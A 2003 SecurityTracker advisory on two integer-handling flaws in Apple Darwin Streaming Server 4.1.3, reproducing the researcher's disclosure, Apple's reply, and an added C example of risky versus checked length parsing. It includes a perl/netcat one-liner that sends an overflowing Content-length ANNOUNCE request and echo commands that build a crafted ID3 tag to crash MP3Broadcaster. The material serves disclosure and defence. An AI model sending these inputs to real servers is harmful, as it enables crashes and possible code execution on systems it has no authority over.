SecurityTracker.com
SecurityTracker
Archives
Category:  Application (Multimedia)  >  QuickTime/Darwin Streaming Server
Vendors:  Apple Computer
Apple Darwin Streaming Server Integer Processing Flaws May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006822
CVE Reference:  GENERIC-MAP-NOMATCH
Updated:  Jun 25 2003
Original Entry Date:  May 23 2003
Impact:  Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via network
Advisory:  Mordred Security Labs
Version(s): 4.1.3
Description:  Two vulnerabilities were reported in the Apple QuickTime/Darwin Streaming Server 4.1.3. A remote user may be able to execute arbitrary code on the server.

Sir Mordred (mordred@s-mail.com) reported some integer manipulation flaws in the QTSSReflector module and the MP3Broadcaster utility.

It is reported that the ANNOUNCE request parsing code in the QTSSReflector module contains an integer overflow. A remote user can send an ANNOUNCE request carrying a crafted Content-length header (the demonstration uses 4294967295, i.e. 0xFFFFFFFF, which reads as -1 when stored in a signed 32-bit integer) to trigger the flaw. It may be possible to execute arbitrary code.

A demonstration exploit transcript is provided:

$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n",
"A"x8192' | nc -v localhost 554
localhost [127.0.0.1] 554 (rtsp) open
too many output retries : Broken pipe

It is also reported that the MP3Broadcaster utility shipped with the server does not properly handle the size fields of ID3 tags in MP3 files. A remote user can supply a specially crafted MP3 file that, when a local user checks it with the utility's -X option, crashes the utility and may allow arbitrary code to be executed.

Some demonstration exploit steps are provided in the Source Message.
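The two flaws above share one pattern: a length taken from attacker-controlled input (the decimal Content-length header, the binary ID3v2.3 frame size) is compared or added before anyone checks that it fits the buffer or the file. The following is an added example written for this page, not Darwin Streaming Server or MP3Broadcaster code; it parses both fields the risky way and the checked way. BODY_MAX, the parser shapes and the sample bytes are assumptions made for the example (the tag bytes are those of the advisory's echo command).

```c
/* Added example (not Darwin Streaming Server or MP3Broadcaster code): the
 * two length fields the advisory abuses, an RTSP Content-length header and
 * an ID3v2.3 frame size, handled first the risky way, then with the checks
 * a parser needs. BODY_MAX, parser shapes and sample bytes are assumptions. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BODY_MAX 8192   /* assumed size of the request-body buffer */

/* Risky: digits accumulate in 32 bits, so "4294967295" becomes 0xFFFFFFFF
 * and reads back as -1 through a signed int. A signed upper-bound check
 * lets -1 through; the first (size_t)len or len + 1 afterwards is ~4 GiB
 * or 0. Returns 1 if the flawed check would accept the header. */
int content_length_risky(const char *hdr, int32_t *out)
{
    const char *p = strchr(hdr, ':');
    if (p == NULL) return 0;
    for (p++; *p == ' '; p++) ;
    uint32_t acc = 0;
    while (*p >= '0' && *p <= '9')
        acc = acc * 10u + (uint32_t)(*p++ - '0');   /* wraps silently mod 2^32 */
    *out = (int32_t)acc;                            /* 0xFFFFFFFF -> -1 on two's-complement targets */
    return *out <= BODY_MAX;                        /* -1 <= 8192: accepted */
}

/* Checked: unsigned parse into 64 bits, reject sign/empty/garbage/ERANGE,
 * then range-check against the real buffer before the value is used.
 * Returns 0 and sets *out on success, -1 on rejection. */
int content_length_checked(const char *hdr, size_t *out)
{
    const char *p = strchr(hdr, ':');
    if (p == NULL) return -1;
    for (p++; *p == ' ' || *p == '\t'; p++) ;
    if (*p < '0' || *p > '9') return -1;            /* rejects "-1", "+5", "" */
    errno = 0;
    char *end;
    unsigned long long v = strtoull(p, &end, 10);
    if (errno == ERANGE) return -1;
    if (*end != '\0' && *end != '\r' && *end != '\n') return -1;
    if (v > BODY_MAX) return -1;
    *out = (size_t)v;
    return 0;
}

/* Constructed tag, the same bytes as the advisory's echo command: "ID3",
 * version 2.3, flags 0, synchsafe tag size 0x0f0f (1935), then a TPE1
 * frame whose big-endian 32-bit size is 0xFFAAAABB (4289374907). */
static const uint8_t CRAFTED_TAG[] = {
    'I','D','3', 0x03,0x00, 0x00, 0x00,0x00,0x0f,0x0f,
    'T','P','E','1', 0xff,0xaa,0xaa,0xbb, 0x00,0x00,
    0x00,0x00,0x00,0x00, '\n'
};
#define CRAFTED_TAG_LEN sizeof(CRAFTED_TAG)

static uint32_t be32(const uint8_t *b)
{
    return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16)
         | ((uint32_t)b[2] << 8)  |  (uint32_t)b[3];
}

/* Risky: trust the frame size. Returns where the first frame "ends":
 * 10 (tag header) + 10 (frame header) + size. A parser that does
 * p += size or memcpy(dst, p, size) from there touches ~4 GiB beyond a
 * 25-byte file, which is the kind of fault the advisory's -X run shows. */
uint64_t id3_first_frame_end_risky(const uint8_t *tag)
{
    return 20u + (uint64_t)be32(tag + 14);
}

/* Checked: every size is compared with the bytes actually present before
 * it moves a pointer or sizes a copy, with subtractions ordered so they
 * cannot wrap. Returns the number of frames walked, or -1 if malformed. */
int id3_walk_frames_checked(const uint8_t *tag, size_t len)
{
    if (len < 10 || memcmp(tag, "ID3", 3) != 0 || tag[3] != 3) return -1;
    uint32_t tagsize = ((uint32_t)(tag[6] & 0x7f) << 21) | ((uint32_t)(tag[7] & 0x7f) << 14)
                     | ((uint32_t)(tag[8] & 0x7f) << 7)  |  (uint32_t)(tag[9] & 0x7f);
    size_t end = (tagsize > len - 10) ? len : 10 + tagsize;   /* clamp to the file */
    size_t off = 10;
    int frames = 0;
    while (end - off >= 10) {
        uint32_t fsize = be32(tag + off + 4);
        if (fsize == 0) break;                      /* padding reached */
        if (fsize > end - off - 10) return -1;      /* frame claims bytes that do not exist */
        off += 10 + fsize;
        frames++;
    }
    return frames;
}

int main(void)
{
    int32_t bad; size_t good;
    printf("risky accepts Content-length 4294967295: %d (stored as %d)\n",
           content_length_risky("Content-length:4294967295", &bad), bad);
    printf("checked accepts it: %d\n",
           content_length_checked("Content-length:4294967295", &good) == 0);
    printf("risky ID3 frame end: %llu of %zu bytes\n",
           (unsigned long long)id3_first_frame_end_risky(CRAFTED_TAG), CRAFTED_TAG_LEN);
    printf("checked ID3 walk: %d\n", id3_walk_frames_checked(CRAFTED_TAG, CRAFTED_TAG_LEN));
    return 0;
}
```

The two checked routines make the same two decisions the risky ones skip: the value is kept unsigned and wide enough that no wrap can occur during parsing, and it is compared against the bytes that really exist (buffer size, remaining file length) before it feeds any pointer arithmetic, allocation or copy.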

The vendor has reportedly been notified. According to the source message, Apple's response characterized both issues as denial of service only and stated that neither is remotely exploitable unless the administrator has enabled unauthenticated remote broadcasts; the reporter disputes the first point.

Impact:  A remote user may be able to execute arbitrary code on the target system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  developer.apple.com/darwin/projects/streaming/
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on Red Hat 7.2
Reported By:  Sir Mordred <mordred@s-mail.com>
Message History:   None.


 Source Message Contents

Date:  Thu, 22 May 2003 19:11:05 +0000
From:  Sir Mordred <mordred@s-mail.com>
Subject:  QuickTime/Darwin Streaming Server security issues

 

// @(#)Security advisory: QuickTime/Darwin Streaming server security issues

Release date: May 22, 2003
Name: QuickTime/Darwin Streaming server security issues
Author: Sir Mordred (mordred@s-mail.com)

I. DESCRIPTION

Darwin Streaming Server (DSS) is server technology which allows
you to send streaming QuickTime data to clients across the Internet using
the industry standard RTP and RTSP protocols.
It is based on the same code as Apple's QuickTime Streaming Server.
Please visit http://developer.apple.com/darwin/projects/streaming/ for more
information about DSS.

II. DETAILS

* ISSUE 1 - Integer overflow in QTSSReflector module

Integer overflow exists in ANNOUNCE request parsing routine:

$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n",
"A"x8192' | nc -v localhost 554
localhost [127.0.0.1] 554 (rtsp) open
too many output retries : Broken pipe

* ISSUE 2 - Integer handling vulnerability in MP3Broadcaster utility

MP3Broadcaster utility which is shipped with DSS, suffers from integer
handling vulnerability in ID3 tags parsing routines.
Below are the steps how to reproduce the issue:

First create the sample configuration file:
$ echo -e "\n" > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e "ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00" > song.mp3

Now, when the user tries to check his mp3 files (-X option):
$ MP3Broadcaster -X -l mp3playlist.ply -c test.conf

Configuration Settings
--------------------------
...
play_mode  sequential
playlist_file  mp3playlist.ply
...

There is one movie in the Playlist.

Segmentation fault (core dumped)

III. VERSIONS TESTED

Linux RedHat 7.2 with DSS 4.1.3

$ echo -ne "OPTIONS * RTSP/1.0\nCseq: 1\n\n" | nc localhost 554
RTSP/1.0 200 OK
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq: 1
Public: DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, ANNOUNCE, SET_PARAMETER, RECORD

IV. VENDOR STATUS

The emails have been sent to product-security@apple.com and
streaming-server-developers@lists.apple.com, and after a bit of waiting I got
a rather interesting answer from Joel Hedden <jhedden@apple.com>:

<quote>
Please correct us if this is wrong:
1.  The bugs are only DoS attacks and cannot be used to breach security of
the host machine, run arbitrary code, etc.
2.  Neither bug is remotely exploitable unless the administrator has enabled
unauthenticated remote broadcasts (which is not likely).
</quote>

I think both of the "bugs" can be used to "breach security of the host
machine, run arbitrary code, etc"...
After receiving the response from Apple I decided to publish the advisory a
bit earlier than I planned.

V. CREDITS

Credits go to:

Sir Mordred <mordred@s-mail.com> who discovered the issues.





[Editor's note:  This message has been edited to remove one line in the 
"CREDITS" section containing personal comments.  No technical information 
has been modified.]

Copyright 2002, SecurityGlobal.net LLC